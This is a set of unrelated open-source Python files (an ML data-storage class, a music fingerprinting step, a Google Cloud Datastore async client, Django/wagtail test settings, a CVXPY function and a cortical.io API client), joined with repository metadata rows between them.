This class implements interface of data for estimators training. It contains data, labels and weights -
all information to train model.
Parameters:
-----------
:param pandas.DataFrame ds: data
:param target: labels for classification and values for regression (set None for predict methods)
:type target: None or numbers.Number or array-like
:param sample_weight: weight (set None for predict methods)
:type sample_weight: None or numbers.Number or array-like
:param random_state: for pseudo random generator
:type random_state: None or int or RandomState
:param bool shuffle: shuffle or not data
"""
def __init__(self, data, target=None, sample_weight=None, random_state=None, shuffle=False):
self.data = data
self.target = self._get_key(self.data, target)
self.sample_weight = self._get_key(self.data, sample_weight, allow_nones=True)
assert len(self.data) == len(self.target), 'ERROR: Lengths are different for data and target'
if self.sample_weight is not None:
assert len(self.data) == len(self.sample_weight), 'ERROR: Lengths are different for data and sample_weight'
self._random_state = check_random_state(random_state).randint(RANDINT)
self.shuffle = shuffle
self._indices = None
def _get_key(self, ds, key, allow_nones=False):
"""
Get data from ds by key
:param pandas.DataFrame ds: data
:param key: what data get from ds
:type key: None or numbers.Number or array-like
:return: key data
"""
if isinstance(key, str) and ds is not None:
# assert key in set(ds.columns), self._print_err('ERROR:', '%s is absent in data storage' % key)
name = list(get_columns_dict([key]).keys())[0]
return numpy.array(get_columns_in_df(self.data, [key])[name])
elif isinstance(key, numbers.Number):
return numpy.array([key] * len(ds))
else:
if not allow_nones:
return numpy.array(key) if key is not None else numpy.ones(len(ds))
else:
return numpy.array(key) if key is not None else key
def __len__(self):
"""
:return: count of rows in storage
:rtype: int
"""
return len(self.data)
def get_data(self, features=None):
"""
Get data for estimator
:param features: set of feature names (if None then use all features in data storage)
:type features: None or list[str]
:rtype: pandas.DataFrame
"""
df = get_columns_in_df(self.data, features)
if self.shuffle:
return df.irow(self.get_indices())
return df
def get_targets(self):
"""
Get sample targets for estimator
:rtype: numpy.array
"""
if self.shuffle:
return self.target[self.get_indices()]
return self.target
def get_weights(self, allow_nones=False):
"""
Get sample weights for estimator
:rtype: numpy.array
"""
if self.sample_weight is None:
if allow_nones:
return self.sample_weight
else:
return numpy.ones(len(self.data))
else:
if self.shuffle:
return self.sample_weight[self.get_indices()]
return self.sample_weight
def get_indices(self):
"""
Get data indices
:rtype: numpy.array
"""
if self._indices is None:
rs = RandomState(seed=self._random_state)
self._indices = rs.permutation(len(self))
return self._indices
def col(self, index):
"""
Get necessary columns
:param index: names
:type index: None or str or list(str)
:rtype: pandas.Series or pandas.DataFrame
"""
if isinstance(index, str):
name = list(get_columns_dict([index]).keys())[0]
return self.get_data([index])[name]
return self.get_data(index)
def eval_column(self, expression):
"""
Evaluate some expression to get necessary data
:type expression: numbers.Number or array-like or str or function(pandas.DataFrame)
:rtype: numpy.array
"""
if isinstance(expression, numbers.Number):
return numpy.zeros(len(self), dtype=type(expression)) + expression
elif isinstance(expression, str):
return numpy.array(self.col(expression))
elif hasattr(expression, '__call__'):
return numpy.array(expression(self.get_data()))
else:
assert len(expression) == len(self), 'Different length'
return numpy.array(expression)
|
apache-2.0
| -9,111,050,701,465,696,000
| 32.656051
| 119
| 0.609008
| false
| 4.190325
| false
| false
| false
|
JustinTulloss/harmonize.fm
|
fileprocess/fileprocess/actions/puidgenerator.py
|
1
|
1905
|
import logging
import os
import subprocess
from baseaction import BaseAction
from fileprocess.processingthread import na
from fileprocess.configuration import config
try:
import musicdns
except ImportError:
musicdns = None
import fileprocess
log = logging.getLogger(__name__)
class PuidGenerator(BaseAction):
def __init__(self, *args, **kwargs):
global musicdns
super(PuidGenerator, self).__init__(*args, **kwargs)
if musicdns:
musicdns.initialize()
def can_skip(self, new_file):
if new_file.get('puid'):
return True
else:
return False
def process(self, file):
global musicdns
if not musicdns:
return file
if file.get('puid'):
return file
if not file.has_key('fname'):
return file
if not os.path.exists(file['fname']):
return file
try:
fp = musicdns.create_fingerprint(file['fname'])
puid = musicdns.lookup_fingerprint(fp[0], fp[1], config['musicdns.key'])
except Exception, e:
log.warn("Could not fingerprint %s: %s", file['fname'], e)
return file #We don't need the fingerprint per say
log.debug('%s has puid %s', file.get('title'), puid)
if puid != None:
file['puid'] = puid
return file
else:
# Spin off a process to do the analysis, we don't care if it
# succeeds or fails, we're just helping out MusicDNS
try:
gp = subprocess.Popen(
['genpuid', config['musicdns.key'], '-xml',
os.path.abspath(file['fname'])],
stdout=open('/dev/null')
)
except Exception, e:
log.info("Could not generate puid: %s", e)
return file
|
mit
| -1,684,215,555,034,553,600
| 27.863636
| 84
| 0.548556
| false
| 4.087983
| false
| false
| false
|
googleapis/python-datastore
|
google/cloud/datastore_v1/services/datastore/async_client.py
|
1
|
28702
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Sequence, Tuple, Type, Union
import pkg_resources
import google.api_core.client_options as ClientOptions # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.datastore_v1.types import datastore
from google.cloud.datastore_v1.types import entity
from google.cloud.datastore_v1.types import query
from .transports.base import DatastoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import DatastoreGrpcAsyncIOTransport
from .client import DatastoreClient
class DatastoreAsyncClient:
"""Each RPC normalizes the partition IDs of the keys in its
input entities, and always returns entities with keys with
normalized partition IDs. This applies to all keys and entities,
including those in values, except keys with both an empty path
and an empty or unset partition ID. Normalization of input keys
sets the project ID (if not already set) to the project ID from
the request.
"""
_client: DatastoreClient
DEFAULT_ENDPOINT = DatastoreClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = DatastoreClient.DEFAULT_MTLS_ENDPOINT
common_billing_account_path = staticmethod(
DatastoreClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
DatastoreClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(DatastoreClient.common_folder_path)
parse_common_folder_path = staticmethod(DatastoreClient.parse_common_folder_path)
common_organization_path = staticmethod(DatastoreClient.common_organization_path)
parse_common_organization_path = staticmethod(
DatastoreClient.parse_common_organization_path
)
common_project_path = staticmethod(DatastoreClient.common_project_path)
parse_common_project_path = staticmethod(DatastoreClient.parse_common_project_path)
common_location_path = staticmethod(DatastoreClient.common_location_path)
parse_common_location_path = staticmethod(
DatastoreClient.parse_common_location_path
)
from_service_account_file = DatastoreClient.from_service_account_file
from_service_account_json = from_service_account_file
@property
def transport(self) -> DatastoreTransport:
"""Return the transport used by the client instance.
Returns:
DatastoreTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(DatastoreClient).get_transport_class, type(DatastoreClient)
)
def __init__(
self,
*,
credentials: credentials.Credentials = None,
transport: Union[str, DatastoreTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the datastore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.DatastoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = DatastoreClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def lookup(
self,
request: datastore.LookupRequest = None,
*,
project_id: str = None,
read_options: datastore.ReadOptions = None,
keys: Sequence[entity.Key] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.LookupResponse:
r"""Looks up entities by key.
Args:
request (:class:`~.datastore.LookupRequest`):
The request object. The request for
[Datastore.Lookup][google.datastore.v1.Datastore.Lookup].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
read_options (:class:`~.datastore.ReadOptions`):
The options for this lookup request.
This corresponds to the ``read_options`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
keys (:class:`Sequence[~.entity.Key]`):
Required. Keys of entities to look
up.
This corresponds to the ``keys`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.LookupResponse:
The response for
[Datastore.Lookup][google.datastore.v1.Datastore.Lookup].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, read_options, keys])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.LookupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if read_options is not None:
request.read_options = read_options
if keys:
request.keys.extend(keys)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.lookup,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
exceptions.DeadlineExceeded, exceptions.ServiceUnavailable,
),
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def run_query(
self,
request: datastore.RunQueryRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.RunQueryResponse:
r"""Queries for entities.
Args:
request (:class:`~.datastore.RunQueryRequest`):
The request object. The request for
[Datastore.RunQuery][google.datastore.v1.Datastore.RunQuery].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.RunQueryResponse:
The response for
[Datastore.RunQuery][google.datastore.v1.Datastore.RunQuery].
"""
# Create or coerce a protobuf request object.
request = datastore.RunQueryRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.run_query,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
exceptions.DeadlineExceeded, exceptions.ServiceUnavailable,
),
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def begin_transaction(
self,
request: datastore.BeginTransactionRequest = None,
*,
project_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.BeginTransactionResponse:
r"""Begins a new transaction.
Args:
request (:class:`~.datastore.BeginTransactionRequest`):
The request object. The request for
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.BeginTransactionResponse:
The response for
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.BeginTransactionRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.begin_transaction,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def commit(
self,
request: datastore.CommitRequest = None,
*,
project_id: str = None,
mode: datastore.CommitRequest.Mode = None,
transaction: bytes = None,
mutations: Sequence[datastore.Mutation] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.CommitResponse:
r"""Commits a transaction, optionally creating, deleting
or modifying some entities.
Args:
request (:class:`~.datastore.CommitRequest`):
The request object. The request for
[Datastore.Commit][google.datastore.v1.Datastore.Commit].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
mode (:class:`~.datastore.CommitRequest.Mode`):
The type of commit to perform. Defaults to
``TRANSACTIONAL``.
This corresponds to the ``mode`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transaction (:class:`bytes`):
The identifier of the transaction associated with the
commit. A transaction identifier is returned by a call
to
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
This corresponds to the ``transaction`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
mutations (:class:`Sequence[~.datastore.Mutation]`):
The mutations to perform.
When mode is ``TRANSACTIONAL``, mutations affecting a
single entity are applied in order. The following
sequences of mutations affecting a single entity are not
permitted in a single ``Commit`` request:
- ``insert`` followed by ``insert``
- ``update`` followed by ``insert``
- ``upsert`` followed by ``insert``
- ``delete`` followed by ``update``
When mode is ``NON_TRANSACTIONAL``, no two mutations may
affect a single entity.
This corresponds to the ``mutations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.CommitResponse:
The response for
[Datastore.Commit][google.datastore.v1.Datastore.Commit].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, mode, transaction, mutations])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.CommitRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if mode is not None:
request.mode = mode
if transaction is not None:
request.transaction = transaction
if mutations:
request.mutations.extend(mutations)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.commit,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def rollback(
self,
request: datastore.RollbackRequest = None,
*,
project_id: str = None,
transaction: bytes = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.RollbackResponse:
r"""Rolls back a transaction.
Args:
request (:class:`~.datastore.RollbackRequest`):
The request object. The request for
[Datastore.Rollback][google.datastore.v1.Datastore.Rollback].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
transaction (:class:`bytes`):
Required. The transaction identifier, returned by a call
to
[Datastore.BeginTransaction][google.datastore.v1.Datastore.BeginTransaction].
This corresponds to the ``transaction`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.RollbackResponse:
The response for
[Datastore.Rollback][google.datastore.v1.Datastore.Rollback].
(an empty message).
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, transaction])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.RollbackRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if transaction is not None:
request.transaction = transaction
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.rollback,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def allocate_ids(
self,
request: datastore.AllocateIdsRequest = None,
*,
project_id: str = None,
keys: Sequence[entity.Key] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.AllocateIdsResponse:
r"""Allocates IDs for the given keys, which is useful for
referencing an entity before it is inserted.
Args:
request (:class:`~.datastore.AllocateIdsRequest`):
The request object. The request for
[Datastore.AllocateIds][google.datastore.v1.Datastore.AllocateIds].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
keys (:class:`Sequence[~.entity.Key]`):
Required. A list of keys with
incomplete key paths for which to
allocate IDs. No key may be
reserved/read-only.
This corresponds to the ``keys`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.AllocateIdsResponse:
The response for
[Datastore.AllocateIds][google.datastore.v1.Datastore.AllocateIds].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, keys])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.AllocateIdsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if keys:
request.keys.extend(keys)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.allocate_ids,
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def reserve_ids(
self,
request: datastore.ReserveIdsRequest = None,
*,
project_id: str = None,
keys: Sequence[entity.Key] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> datastore.ReserveIdsResponse:
r"""Prevents the supplied keys' IDs from being auto-
llocated by Cloud Datastore.
Args:
request (:class:`~.datastore.ReserveIdsRequest`):
The request object. The request for
[Datastore.ReserveIds][google.datastore.v1.Datastore.ReserveIds].
project_id (:class:`str`):
Required. The ID of the project
against which to make the request.
This corresponds to the ``project_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
keys (:class:`Sequence[~.entity.Key]`):
Required. A list of keys with
complete key paths whose numeric IDs
should not be auto-allocated.
This corresponds to the ``keys`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.datastore.ReserveIdsResponse:
The response for
[Datastore.ReserveIds][google.datastore.v1.Datastore.ReserveIds].
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([project_id, keys])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = datastore.ReserveIdsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if project_id is not None:
request.project_id = project_id
if keys:
request.keys.extend(keys)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.reserve_ids,
default_retry=retries.Retry(
initial=0.1,
maximum=60.0,
multiplier=1.3,
predicate=retries.if_exception_type(
exceptions.DeadlineExceeded, exceptions.ServiceUnavailable,
),
),
default_timeout=60.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-datastore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("DatastoreAsyncClient",)
|
apache-2.0
| 3,394,507,495,499,587,600
| 39.255259
| 93
| 0.602676
| false
| 4.768566
| false
| false
| false
|
takeflight/wagtailtestutils
|
tests/settings.py
|
1
|
2498
|
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
SECRET_KEY = 'not needed'
ROOT_URLCONF = 'wagtail.tests.urls'
STATIC_URL = '/static/'
STATIC_ROOT = 'static/'
COMPRESS_ENABLED = False
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
USE_TZ = True
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'wagtail.wagtailcore.middleware.SiteMiddleware',
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'wagtail.tests.context_processors.do_not_use_static_url',
],
},
},
]
INSTALLED_APPS = (
'tests',
'wagtail.wagtailsites',
'wagtail.wagtailusers',
'wagtail.wagtailadmin',
'wagtail.wagtailcore',
'wagtail.wagtailimages',
'wagtail.wagtaildocs',
'wagtail.wagtailsearch',
'taggit',
'compressor',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
# Using DatabaseCache to make sure that the cache is cleared between tests.
# This prevents false-positives in some wagtail core tests where we are
# changing the 'wagtail_root_paths' key which may cause future tests to fail.
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'cache',
}
}
PASSWORD_HASHERS = (
'django.contrib.auth.hashers.MD5PasswordHasher', # don't use the intentionally slow default password hasher
)
WAGTAIL_SITE_NAME = "Test Site"
|
bsd-2-clause
| 2,868,741,275,238,496,000
| 26.152174
| 112
| 0.665733
| false
| 3.927673
| true
| true
| false
|
sergiocallegari/PyDSM
|
cvxpy_tinoco/functions/abs.py
|
1
|
2839
|
#***********************************************************************#
# Copyright (C) 2010-2012 Tomas Tinoco De Rubira #
# #
# This file is part of CVXPY #
# #
# CVXPY is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# CVXPY is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
#***********************************************************************#
import numpy as np
from ..defs import *
from ..utils import *
from ..interface import *
from ..arrays import cvxpy_array
from ..arrays import cvxpy_matrix
# abs
def abs(x):
"""
| :math:`\mbox{abs} :
\mathbb{R}^{m \\times n} \\to \mathbb{R}^{m \\times n},
\ \mbox{abs}(X)_{ij} = |X_{ij}|`.
| Convex.
:param x: number,
:ref:`scalar object<scalar_ref>` or
:ref:`multidimensional object<multi_ref>`.
:return: number,
:ref:`tree<tree_obj>`,
:ref:`matrix<matrix_obj>` or
:ref:`array<array_obj>`.
"""
# Prepare input
if (np.isscalar(x) or
type(x).__name__ in SCALAR_OBJS):
arg = vstack([x])
elif (type(x) is cvxpy_matrix or
type(x).__name__ in ARRAY_OBJS):
arg = x
else:
raise TypeError('Invalid argument')
# Prepare output
if type(arg) is cvxpy_matrix:
output = zeros(arg.shape)
else:
output = cvxpy_array(arg.shape[0],arg.shape[1])
# Construct program
for i in range(0,arg.shape[0],1):
for j in range(0,arg.shape[1],1):
t = variable()
v = variable()
p = program(minimize(t),
[less_equals(v,t),less_equals(-t,v)],
[v],
name='abs')
output[i,j] = p(arg[i,j])
# Return output
if output.shape == (1,1):
return output[0,0]
else:
return output
|
gpl-3.0
| -5,290,735,920,992,748,000
| 36.853333
| 78
| 0.450863
| false
| 4.144526
| false
| false
| false
|
cortical-io/retina-sdk.py
|
retinasdk/client/expressions_api.py
|
1
|
8726
|
"""
/*******************************************************************************
* Copyright (c) cortical.io GmbH. All rights reserved.
*
* This software is confidential and proprietary information.
* You shall use it only in accordance with the terms of the
* license agreement you entered into with cortical.io GmbH.
******************************************************************************/
"""
from retinasdk.model import context
from retinasdk.model import fingerprint
from retinasdk.model import term
class ExpressionsApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def resolveExpression(self, retina_name, body, sparsity=1.0):
"""Resolve an expression
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON formatted encoded to be evaluated (required)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Fingerprint
"""
resourcePath = '/expressions'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['sparsity'] = sparsity
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return fingerprint.Fingerprint(**response.json())
def getContextsForExpression(self, retina_name, body, get_fingerprint=None, start_index=0, max_results=5, sparsity=1.0):
"""Get semantic contexts for the input expression
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
start_index, int: The start-index for pagination (optional) (optional)
max_results, int: Max results per page (optional) (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Context]
"""
resourcePath = '/expressions/contexts'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [context.Context(**r) for r in response.json()]
def getSimilarTermsForExpressionContext(self, retina_name, body, context_id=None, pos_type=None, get_fingerprint=None, start_index=0, max_results=10, sparsity=1.0):
"""Get similar terms for the contexts of an expression
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
context_id, int: The identifier of a context (optional) (optional)
pos_type, str: Part of speech (optional) (optional)
get_fingerprint, bool: Configure if the fingerprint should be returned as part of the results (optional)
start_index, int: The start-index for pagination (optional) (optional)
max_results, int: Max results per page (optional) (optional)
sparsity, float: Sparsify the resulting expression to this percentage (optional)
Returns: Array[Term]
"""
resourcePath = '/expressions/similar_terms'
method = 'POST'
queryParams = {}
headerParams = {'Accept': 'Application/json', 'Content-Type': 'application/json'}
postData = None
queryParams['retina_name'] = retina_name
queryParams['context_id'] = context_id
queryParams['start_index'] = start_index
queryParams['max_results'] = max_results
queryParams['pos_type'] = pos_type
queryParams['sparsity'] = sparsity
queryParams['get_fingerprint'] = get_fingerprint
postData = body
response = self.apiClient._callAPI(resourcePath, method, queryParams, postData, headerParams)
return [term.Term(**r) for r in response.json()]
def resolveBulkExpression(self, retina_name, body, sparsity=1.0):
"""Bulk resolution of expressions
Args:
retina_name, str: The retina name (required)
body, ExpressionOperation: The JSON encoded expression to be evaluated (required)
